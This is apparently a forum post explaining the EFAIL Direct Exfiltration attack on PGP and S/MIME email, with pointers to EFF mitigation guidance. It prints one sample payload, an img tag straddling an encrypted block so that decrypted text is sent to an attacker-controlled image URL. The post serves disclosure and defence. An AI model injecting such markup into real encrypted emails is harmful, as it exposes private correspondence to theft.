Untitled

@Hans W mentioned EFAIL vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that captures the plain-text of encrypted emails.

There are two types of EFAIL exploits, Direct Exfiltration and CBC/CFB Gadget Attack. This article only addresses the Direct Exfiltration exploit.

The Direct Exfiltration attack exploits the way email clients handle HTML externally requested objects such as graphics and styles immediately following decryption.

The attacker injects an HTML statement requesting the external object. With the start tag and end tag straddling the encrypted body of the email.

Example using a graphic request:

<img scr=”http***cheaptrick.gif”
-----BEGIN PGP MESSAGE-----
Version: PGP Personal Security 7.0.3
Encrypted Block of Text
-----END PGP MESSAGE-----
“>

Immediately following decryption, the email client requests the external graphic and all the decrypted information between the tags is sent to and captured by the attacker.

The simplicity of the exploit allows the attacker to inject the code to any detected encrypted email.

On 29 May 2018, the EFF published How To Turn PGP Back On As Safely As Possible. Using versions of Thunderbird 52.8 using the Enigmail 2.0.6 plugin or above provides a measure of security. Read the entire article for settings and recommended methods to protect your privacy.

Some of the more obvious mitigating measures should be closely evaluated. All email clients should be evaluated for their ability to mitigate this exploit.

I plan to post other articles covering the CBC/CFB Gadget Attack and mitigation methos.

These are the primary sources for this article. Be sure to review the links for more information and mitigating measures.

EFAIL.DE
PGP and EFAIL: Frequently Asked Questions

I welcome any corrections, comments, and thoughts.

EFAIL #Encryption #Decryption #Attack #Exploit #Vulnerability #PGP #S/MIME #OpenPGP #GPG #Email #EFF #Thunderbird #Enigmail